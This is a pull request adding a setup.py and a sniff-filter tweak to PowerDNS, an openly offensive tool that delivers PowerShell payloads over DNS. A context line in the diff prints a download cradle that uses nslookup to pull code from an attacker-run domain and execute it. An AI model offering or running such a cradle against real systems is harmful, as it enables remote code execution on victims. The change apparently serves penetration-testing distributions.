### PR TITLE
 Added a basic setup.py to facilitate systemwide installs

### DIFF
--- a/powerdns.py
+++ b/powerdns.py
@@ -121,7 +121,7 @@ if __name__ == '__main__':
         print "\033[1;34m[*] PowerDNS:\033[0;0m Use the following download cradle:\n\033[1;34m[*] PowerDNS:\033[0;0m powershell \"powershell (nslookup -q=txt -timeout={} 0.{})[-1]\"".format(timeout, domain)
 
         while True:
-            mSniff = sniff(filter="udp dst port 53", iface=interface, prn=powerdnsHandler)
+            mSniff = sniff(filter="inbound and udp dst port 53", iface=interface, prn=powerdnsHandler)
     except Exception as e:
         print "\033[1;34m[*] PowerDNS:\033[0;0m Error when binding to interface: {}".format(e)
         sys.exit(-1)

--- a/setup.py
+++ b/setup.py
@@ -1,0 +1,23 @@
+#!/usr/bin/python
+
+import glob
+import os
+
+from distutils.core import setup
+
+PACKAGE_NAME = "PowerDNS"
+
+setup(name = PACKAGE_NAME,
+      version = "1.0.0",
+      description = "A tool for performing Powershell DNS Delivery",
+      url = "https://github.com/mdsecactivebreach/PowerDNS",
+      author = "domchell",
+      author_email = "dominic@mdsec.co.uk",
+      maintainer = "domchell",
+      maintainer_email = "dominic@mdsec.co.uk",
+      platforms = ["Unix","Windows"],
+      scripts = ['powerdns.py'],
+      data_files = [(os.path.join('share', 'doc', PACKAGE_NAME), ['README.md'])],
+      requires=['scapy (>=2.4.0)'],
+      )
+


### PR DESCRIPTION
With this, setuptools can handle installing to /usr/bin/powerdns.py, for use by pentest distros, etc.